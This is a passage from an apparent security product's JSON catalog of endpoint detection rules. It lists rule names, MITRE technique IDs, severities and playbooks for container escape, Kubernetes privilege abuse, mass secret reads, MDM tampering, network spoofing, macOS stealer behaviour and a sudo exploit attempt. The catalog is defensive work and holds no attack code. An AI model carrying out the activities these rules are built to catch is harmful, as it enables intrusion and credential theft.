"enabled": true, "path": "detections/endpoint/container-image-tag-latest-prod.yaml" }, { "id": "det-endpoint-234", "type": "detection", "name": "Container Started As UID 0 In Production", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Container Started As UID 0 In Production'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "docker", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-running-as-root-prod.yaml" }, { "id": "det-endpoint-235", "type": "detection", "name": "Container Mounted Host Root Filesystem", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Container Mounted Host Root Filesystem'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "docker", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-hostpath-mount-root.yaml" }, { "id": "det-endpoint-236", "type": "detection", "name": "Container Mounted /etc From Host", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Container Mounted /etc From Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "docker", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-mount-etc.yaml" }, { "id": "det-endpoint-237", "type": "detection", "name": "Container Created With ReadOnlyRootFilesystem False", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Container Created With ReadOnlyRootFilesystem False'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "docker", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-readonly-fs-disabled.yaml" }, { "id": "det-endpoint-238", "type": "detection", "name": "docker build Run On Production Host", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'docker build Run On Production Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1612" ], "log_source": "docker", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-build-on-host.yaml" }, { "id": "det-endpoint-239", "type": "detection", "name": "Docker-In-Docker Pattern Detected", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Docker-In-Docker Pattern Detected'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "docker", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-dind-detected.yaml" }, { "id": "det-endpoint-240", "type": "detection", "name": "Pod Created With hostNetwork: true", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Pod Created With hostNetwork: true'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-pod-hostnetwork-true.yaml" }, { "id": "det-endpoint-241", "type": "detection", "name": "Pod Created With hostPID: true", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Pod Created With hostPID: true'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-pod-hostpid-true.yaml" }, { "id": "det-endpoint-242", "type": "detection", "name": "Pod Created With hostIPC: true", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Pod Created With hostIPC: true'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-pod-hostipc-true.yaml" }, { "id": "det-endpoint-243", "type": "detection", "name": "Pod Created With privileged Security Context", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Pod Created With privileged Security Context'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-pod-privileged.yaml" }, { "id": "det-endpoint-244", "type": "detection", "name": "Pod Allows Privilege Escalation", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Pod Allows Privilege Escalation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-pod-allow-priv-esc.yaml" }, { "id": "det-endpoint-245", "type": "detection", "name": "RoleBinding Created Bound To cluster-admin ClusterRole", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'RoleBinding Created Bound To cluster-admin ClusterRole'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1098.003" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-rolebinding-cluster-admin.yaml" }, { "id": "det-endpoint-246", "type": "detection", "name": "ClusterRoleBinding To system:masters", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ClusterRoleBinding To system:masters'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1098.003" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-clusterrolebinding-system-masters.yaml" }, { "id": "det-endpoint-247", "type": "detection", "name": "Kubernetes Verb 'impersonate' Used", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Kubernetes Verb 'impersonate' Used'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1078.004" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-impersonate-verb.yaml" }, { "id": "det-endpoint-248", "type": "detection", "name": "MutatingWebhookConfiguration Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'MutatingWebhookConfiguration Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1098" ], "log_source": "kubernetes", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-mutating-webhook-changed.yaml" }, { "id": "det-endpoint-249", "type": "detection", "name": "ValidatingWebhookConfiguration Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ValidatingWebhookConfiguration Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1098" ], "log_source": "kubernetes", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-validating-webhook-changed.yaml" }, { "id": "det-endpoint-250", "type": "detection", "name": "Pod Security Admission Mode Disabled For Namespace", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Pod Security Admission Mode Disabled For Namespace'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "kubernetes", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-pod-security-disabled-namespace.yaml" }, { "id": "det-endpoint-251", "type": "detection", "name": "kube-apiserver Started With --anonymous-auth=true", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'kube-apiserver Started With --anonymous-auth=true'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1078.004" ], "log_source": "kubernetes", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-anonymous-auth-enabled.yaml" }, { "id": "det-endpoint-252", "type": "detection", "name": "Exec Into Pod In kube-system Namespace", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Exec Into Pod In kube-system Namespace'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "kubernetes", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-exec-into-kube-system.yaml" }, { "id": "det-endpoint-253", "type": "detection", "name": "Many Secrets Read From Single Service Account", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Many Secrets Read From Single Service Account'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1552.007" ], "log_source": "kubernetes", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-secret-mass-read.yaml" }, { "id": "det-endpoint-254", "type": "detection", "name": "NetworkPolicy Deleted In Restricted Namespace", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'NetworkPolicy Deleted In Restricted Namespace'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.004" ], "log_source": "kubernetes", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-networkpolicy-deleted-restricted-ns.yaml" }, { "id": "det-endpoint-255", "type": "detection", "name": "Pod Created From Known Cryptominer Image Family", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Pod Created From Known Cryptominer Image Family'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1496" ], "log_source": "kubernetes", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/k8s-pod-runs-cryptominer-image.yaml" }, { "id": "det-endpoint-256", "type": "detection", "name": "iOS Jailbreak Detected By MDM", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'iOS Jailbreak Detected By MDM'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1404" ], "log_source": "ios", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-ios-jailbreak-detected.yaml" }, { "id": "det-endpoint-257", "type": "detection", "name": "Android Root Detected By MDM", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Android Root Detected By MDM'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1404" ], "log_source": "android", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-android-root-detected.yaml" }, { "id": "det-endpoint-258", "type": "detection", "name": "Device Marked Out Of MDM Compliance", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Device Marked Out Of MDM Compliance'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1078" ], "log_source": "mdm", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-mdm-out-of-compliance.yaml" }, { "id": "det-endpoint-259", "type": "detection", "name": "App Sideloaded Outside Of Managed Store", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'App Sideloaded Outside Of Managed Store'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1659" ], "log_source": "mobile", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-app-sideloaded.yaml" }, { "id": "det-endpoint-260", "type": "detection", "name": "MDM Profile Removal Attempted", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'MDM Profile Removal Attempted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1562" ], "log_source": "mdm", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-mdm-removal-attempt.yaml" }, { "id": "det-endpoint-261", "type": "detection", "name": "VPN App Installed On Managed Device", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'VPN App Installed On Managed Device'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1572" ], "log_source": "mobile", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-vpn-app-installed.yaml" }, { "id": "det-endpoint-262", "type": "detection", "name": "Find My Device Disabled", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Find My Device Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562" ], "log_source": "mobile", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-find-device-disabled.yaml" }, { "id": "det-endpoint-263", "type": "detection", "name": "Screen Lock Disabled On Managed Device", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Screen Lock Disabled On Managed Device'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1078" ], "log_source": "mobile", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-screen-lock-disabled.yaml" }, { "id": "det-endpoint-264", "type": "detection", "name": "iCloud Account Changed On Managed iOS Device", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'iCloud Account Changed On Managed iOS Device'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1078" ], "log_source": "ios", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-icloud-account-swap.yaml" }, { "id": "det-endpoint-265", "type": "detection", "name": "Google Account Changed On Managed Android Device", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Google Account Changed On Managed Android Device'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1078" ], "log_source": "android", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-google-account-swap.yaml" }, { "id": "det-endpoint-266", "type": "detection", "name": "Accessibility Permission Granted To Untrusted App", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Accessibility Permission Granted To Untrusted App'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1530" ], "log_source": "android", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-accessibility-permission-granted.yaml" }, { "id": "det-endpoint-267", "type": "detection", "name": "Network Proxy Configured On Managed Device", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Network Proxy Configured On Managed Device'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1556" ], "log_source": "mobile", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-network-proxy-configured.yaml" }, { "id": "det-endpoint-268", "type": "detection", "name": "Developer Mode Enabled On Managed Device", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Developer Mode Enabled On Managed Device'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1078" ], "log_source": "mobile", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-developer-mode-enabled.yaml" }, { "id": "det-endpoint-269", "type": "detection", "name": "Untrusted Root Certificate Installed On Device", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Untrusted Root Certificate Installed On Device'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1553.004" ], "log_source": "mobile", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-mdm-cert-untrusted.yaml" }, { "id": "det-endpoint-270", "type": "detection", "name": "Personal Hotspot Or Bluetooth Tethering Enabled In Restricted Site", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Personal Hotspot Or Bluetooth Tethering Enabled In Restricted Site'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1011" ], "log_source": "mobile", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-bluetooth-tethering-public.yaml" }, { "id": "det-endpoint-271", "type": "detection", "name": "Host Firewall Disabled On Managed Endpoint", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Host Firewall Disabled On Managed Endpoint'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.004" ], "log_source": "endpoint", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-firewall-disabled-managed.yaml" }, { "id": "det-endpoint-272", "type": "detection", "name": "Network Interface Set To Promiscuous Mode", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Network Interface Set To Promiscuous Mode'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1040" ], "log_source": "endpoint", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-promiscuous-interface.yaml" }, { "id": "det-endpoint-273", "type": "detection", "name": "ARP Cache Poisoning Indicators On Host", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ARP Cache Poisoning Indicators On Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1557.002" ], "log_source": "endpoint", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-arp-poison-detected.yaml" }, { "id": "det-endpoint-274", "type": "detection", "name": "Suspicious LLMNR Reply Pattern (Responder-Like)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Suspicious LLMNR Reply Pattern (Responder-Like)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1557.001" ], "log_source": "endpoint", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-llmnr-replies-spoofed.yaml" }, { "id": "det-endpoint-275", "type": "detection", "name": "WPAD Probe Reaching External Resolver", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'WPAD Probe Reaching External Resolver'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1557.002" ], "log_source": "endpoint", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-wpad-probe.yaml" }, { "id": "det-endpoint-276", "type": "detection", "name": "Host Advertising As DHCP Server", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Host Advertising As DHCP Server'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1557" ], "log_source": "endpoint", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-rogue-dhcp-host.yaml" }, { "id": "det-endpoint-277", "type": "detection", "name": "mDNS Query For Non-.local Suffix", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'mDNS Query For Non-.local Suffix'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1018" ], "log_source": "endpoint", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-mdns-suspicious-tld.yaml" }, { "id": "det-endpoint-278", "type": "detection", "name": "UPnP/SSDP Beacons From Server Subnet", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'UPnP/SSDP Beacons From Server Subnet'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1018" ], "log_source": "endpoint", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-upnp-from-server.yaml" }, { "id": "det-endpoint-279", "type": "detection", "name": "RDP Client Saw Certificate Mismatch", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'RDP Client Saw Certificate Mismatch'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1557.002" ], "log_source": "endpoint", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-rdp-mitm-cert-mismatch.yaml" }, { "id": "det-endpoint-280", "type": "detection", "name": "SCCM Client Installed From Untrusted Source", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'SCCM Client Installed From Untrusted Source'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1195.002" ], "log_source": "endpoint", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-sccm-client-untrusted.yaml" }, { "id": "det-endpoint-281", "type": "detection", "name": "AMoS Stealer Virtual Machine Detection via osquery", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'AMoS Stealer Virtual Machine Detection via osquery'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1059.002" ], "log_source": "osquery", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-amos-stealer-vm-check.yaml" }, { "id": "det-endpoint-282", "type": "detection", "name": "macOS Data Chunking via dd or split", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Data Chunking via dd or split'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1030" ], "log_source": "osquery", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-data-chunking.yaml" }, { "id": "det-endpoint-283", "type": "detection", "name": "macOS Gatekeeper Bypass Attempt", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Gatekeeper Bypass Attempt'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1553.001" ], "log_source": "osquery", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-gatekeeper-bypass.yaml" }, { "id": "det-endpoint-284", "type": "detection", "name": "Suspicious PlistBuddy LaunchAgent Modification", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Suspicious PlistBuddy LaunchAgent Modification'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1543.001" ], "log_source": "osquery", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-suspicious-plistbuddy.yaml" }, { "id": "det-endpoint-285", "type": "detection", "name": "Baron Samedit CVE-2021-3156 Exploit Attempt", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Baron Samedit CVE-2021-3156 Exploit Attempt'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1068" ], "log_source": "osquery", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-linux-baron-samedit-cve-2021-3156.yaml" }, { "id": "det-endpoint-286", "type": "detection", "name": "Linux osqueryd Service Stop Detected via auditd", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Linux osqueryd Service Stop Detected via auditd'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1489" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-linux-auditd-service-stop.yaml" }, { "id": "det-endpoint-287", "type": "detection", "name": "macOS Local User Account Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Local User Account Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1136.001" ], "log_source": "osquery", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-account-created.yaml" }, { "id": "det-endpoint-288", "type": "detection", "name": "macOS Hidden File or Directory Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Hidden File or Directory Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1564.001" ], "log_source": "osquery", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-hidden-file-directory.yaml" }, { "id": "det-endpoint-289", "type": "detection", "name": "macOS Kernel Extension Loaded via kextload", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Kernel Extension Loaded via kextload'. 